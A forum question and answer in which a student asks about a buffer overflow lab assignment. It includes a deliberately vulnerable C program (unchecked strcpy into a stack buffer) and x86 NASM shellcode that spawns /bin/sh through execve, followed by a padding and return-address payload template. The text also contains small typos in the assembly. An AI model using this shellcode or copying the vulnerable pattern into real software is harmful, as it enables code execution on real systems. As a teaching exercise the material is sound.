# Buffer overflow with an example

Tags: c, linux, assembly, buffer-overflow

I have a C code and a assembly code which I have to use to perform a bufferoverflow attack on the C program using GDB. I would probably use the command run $(cat ), but..

I can't manage to compile the assembler code - `times NNNN  db 0xff` gives an error about assigning non constant values, but I don't actually know what it does, or is supposed to do.

It seems that the last 4 lines work like a push on stack which esi points to, right?

Line `mov byte al, 0x0b` calls for execv with arguments /bin/sh0, AAAA and BBBB. Why do we need the last two?

Lastly the `int 0x80` which again I don't know what does it do.

Also, the `jmp short callit` -> `callit doit` what is the difference between that and just starting with doit from the beginning?

If someone could help me out I'd be grateful, I'm lost after googling for hours.

NASM x86 code:

```
BITS 32
jmp short   callit

doit:
pop         esi
xor         eax, eax
mov         byte [esi+7], al
lea         bx, [esi]
mov         dword [esi+8], ebx
mov         dword [esi+12], eax
mov         byte al, 0x0b
mov         ebx, esi
lea         exc, [esi+8]
lea         edx, [esi+12]
int         0x80

callit
call        doit

            db '/bin/sh#AAAABBBB'
times NNNN  db 0xff
            dd 0xbffff050
            db 0x00
```

C code:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) { 
    char buffer[256];

    if (argc > 1) {
        strcpy(buffer, argv[1]);
    }
    printf("%p\n", buffer);
    return 0;
}
```

Answer (score 2):

You can't assemble `times NNNN  db 0xff` because `NNNN` is not defined anywhere. You are presumably supposed to substitute a number there.

You need `AAAA` and `BBBB` so you can set up the `argv` array for the system call. `argv[0]` should be pointing to the program name and `argv[1]` should be `NULL`.

The `CALL` is used because that puts the return address on the stack, so you can use that to figure out the absolute address of your data.

Comment: But.. what am I supposed to put in there? I have no idea what is the purpose of these db/dd declarations. Overall, I know that I have to overflow the buffer exactly so that I can change the address to which ret jumps in strcpy to presumably the execv call with shell, but I am lost on how to do that :/